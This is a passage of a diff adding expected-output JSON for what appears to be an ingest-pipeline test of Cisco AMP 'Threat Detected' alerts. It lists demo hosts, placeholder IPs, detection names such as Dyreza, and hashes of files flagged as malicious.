+                "path": "\\\\?\\C:\\ekjrngjker.exe",
+                "hash": {
+                    "sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
+                    "sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
+                    "md5": "b99e0a8c56f963246b6464b9fffbf7a2"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_AMP_Threat_Audit"
+                ],
+                "hash": [
+                    "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
+                    "b99e0a8c56f963246b6464b9fffbf7a2",
+                    "b024546a49bad1bd60fccef0a5d11b55f9a442c4"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_AMP_Threat_Audit",
+                "hostname": "Demo_AMP_Threat_Audit",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:04.469668742Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669147354595000,\"timestamp\":1610705938,\"timestamp_nanoseconds\":375000000,\"date\":\"2021-01-15T10:18:58+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669147354595368\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6533669147354595000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.File.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "63:5f:47:2b:89:91",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "63:5f:47:2b:89:91"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6533669147354595368",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-15T10:18:58.000Z",
+            "file": {
+                "name": "ekjrngjker.exe",
+                "path": "C:\\ekjrngjker.exe",
+                "hash": {
+                    "sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
+                    "sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
+                    "md5": "b99e0a8c56f963246b6464b9fffbf7a2"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_AMP_Threat_Audit"
+                ],
+                "hash": [
+                    "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
+                    "b99e0a8c56f963246b6464b9fffbf7a2",
+                    "b024546a49bad1bd60fccef0a5d11b55f9a442c4"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_AMP_Threat_Audit",
+                "user": {
+                    "name": "user@testdomain.com"
+                },
+                "hostname": "Demo_AMP_Threat_Audit"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:04.469670637Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669147354595000,\"timestamp\":1610705938,\"timestamp_nanoseconds\":360000000,\"date\":\"2021-01-15T10:18:58+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669147354595367\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6533669147354595000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.File.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "63:5f:47:2b:89:91",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "63:5f:47:2b:89:91"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6533669147354595367",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-15T10:18:57.000Z",
+            "file": {
+                "name": "ekjrngjker.exe",
+                "path": "C:\\ekjrngjker.exe",
+                "hash": {
+                    "sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
+                    "sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
+                    "md5": "b99e0a8c56f963246b6464b9fffbf7a2"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_AMP_Threat_Audit"
+                ],
+                "hash": [
+                    "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
+                    "b99e0a8c56f963246b6464b9fffbf7a2",
+                    "b024546a49bad1bd60fccef0a5d11b55f9a442c4"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_AMP_Threat_Audit",
+                "user": {
+                    "name": "user@testdomain.com"
+                },
+                "hostname": "Demo_AMP_Threat_Audit"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:04.469672538Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669143059628000,\"timestamp\":1610705937,\"timestamp_nanoseconds\":968000000,\"date\":\"2021-01-15T10:18:57+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669143059628070\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6533669143059628000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.File.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "63:5f:47:2b:89:91",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "63:5f:47:2b:89:91"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6533669143059628070",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-15T10:18:25.000Z",
+            "file": {
+                "name": "webinstall.exe",
+                "path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe",
+                "hash": {
+                    "sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0",
+                    "sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc",
+                    "md5": "e9d8c15e7d18678dd41771f72ed6693c"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_Dyre"
+                ],
+                "hash": [
+                    "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc",
+                    "e9d8c15e7d18678dd41771f72ed6693c",
+                    "ec80314ae4a2817be806b7ae27dbdb31a88226a0"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_Dyre",
+                "hostname": "Demo_Dyre"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:04.469674438Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259286289613000,\"timestamp\":1610705905,\"timestamp_nanoseconds\":669000000,\"date\":\"2021-01-15T10:18:25+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259286289612895\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6176259286289613000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "GenericKD:Dyreza-tpd",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "23:d5:92:eb:f8:9b",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "23:d5:92:eb:f8:9b"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6176259286289612895",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-15T10:18:13.000Z",
+            "file": {
+                "name": "webinstall.exe",
+                "path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe",
+                "hash": {
+                    "sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0",
+                    "sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc",
+                    "md5": "e9d8c15e7d18678dd41771f72ed6693c"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_Dyre"
+                ],
+                "hash": [
+                    "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc",
+                    "e9d8c15e7d18678dd41771f72ed6693c",
+                    "ec80314ae4a2817be806b7ae27dbdb31a88226a0"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_Dyre",
+                "hostname": "Demo_Dyre"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:04.469676331Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259234750005000,\"timestamp\":1610705893,\"timestamp_nanoseconds\":657000000,\"date\":\"2021-01-15T10:18:13+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259234750005342\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6176259234750005000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "GenericKD:Dyreza-tpd",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "23:d5:92:eb:f8:9b",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "23:d5:92:eb:f8:9b"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6176259234750005342",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-15T10:18:01.000Z",
+            "file": {
+                "name": "webinstall.exe",
+                "path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe",
+                "hash": {
+                    "sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0",
+                    "sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc",
+                    "md5": "e9d8c15e7d18678dd41771f72ed6693c"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_Dyre"
+                ],
+                "hash": [
+                    "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc",
+                    "e9d8c15e7d18678dd41771f72ed6693c",
+                    "ec80314ae4a2817be806b7ae27dbdb31a88226a0"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_Dyre",
+                "hostname": "Demo_Dyre"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:04.469678203Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259183210398000,\"timestamp\":1610705881,\"timestamp_nanoseconds\":645000000,\"date\":\"2021-01-15T10:18:01+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259183210397789\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6176259183210398000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "GenericKD:Dyreza-tpd",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "23:d5:92:eb:f8:9b",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "23:d5:92:eb:f8:9b"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6176259183210397789",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "process": {
+                "name": "explorer.exe",
+                "pid": 3164,
+                "hash": {
+                    "sha1": "cea0890d4b99bae3f635a16dae71f69d137027b9",
+                    "sha256": "9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad",
+                    "md5": "8b88ebbb05a0e56b7dcc708498c02b3e"
+                }
+            },
+            "@timestamp": "2021-01-15T10:17:58.000Z",
+            "file": {
+                "name": "Fax.exe",
+                "path": "\\\\?\\C:\\Users\\Administrator\\Documents\\Fax\\Fax.exe",
+                "hash": {
+                    "sha1": "f9b02ad8d25157eebdb284631ff646316dc606d5",
+                    "sha256": "fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc",
+                    "md5": "b2e15a06b0cca8a926c94f8a8eae3d88"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_Upatre"
+                ],
+                "hash": [
+                    "fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc",
+                    "b2e15a06b0cca8a926c94f8a8eae3d88",
+                    "f9b02ad8d25157eebdb284631ff646316dc606d5"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_Upatre",
+                "hostname": "Demo_Upatre",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:04.469680172Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180335966167761000,\"timestamp\":1610705878,\"timestamp_nanoseconds\":875000000,\"date\":\"2021-01-15T10:17:58+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6180335966167760897\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"Fax.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\Documents\\\\Fax\\\\Fax.exe\",\"identity\":{\"sha256\":\"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc\",\"sha1\":\"f9b02ad8d25157eebdb284631ff646316dc606d5\",\"md5\":\"b2e15a06b0cca8a926c94f8a8eae3d88\"},\"parent\":{\"process_id\":3164,\"disposition\":\"Clean\",\"file_name\":\"explorer.exe\",\"identity\":{\"sha256\":\"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad\",\"sha1\":\"cea0890d4b99bae3f635a16dae71f69d137027b9\",\"md5\":\"8b88ebbb05a0e56b7dcc708498c02b3e\"}}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6180335966167761000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.File.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "e1:e5:94:ea:a5:44",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "parent": {
+                            "disposition": "Clean",
+                            "identity": {}
+                        },
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "e1:e5:94:ea:a5:44"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6180335966167760897",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-15T10:17:57.000Z",
+            "file": {
+                "name": "ekjrngjker.exe",
+                "path": "\\\\?\\C:\\ekjrngjker.exe",
+                "hash": {
+                    "sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
+                    "sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
+                    "md5": "b99e0a8c56f963246b6464b9fffbf7a2"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_AMP_Threat_Audit"
+                ],
+                "hash": [
+                    "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
+                    "b99e0a8c56f963246b6464b9fffbf7a2",
+                    "b024546a49bad1bd60fccef0a5d11b55f9a442c4"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_AMP_Threat_Audit",
+                "hostname": "Demo_AMP_Threat_Audit",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:04.469682061Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668885361590000,\"timestamp\":1610705877,\"timestamp_nanoseconds\":672000000,\"date\":\"2021-01-15T10:17:57+00:00\",\"event_type\":\"Threat 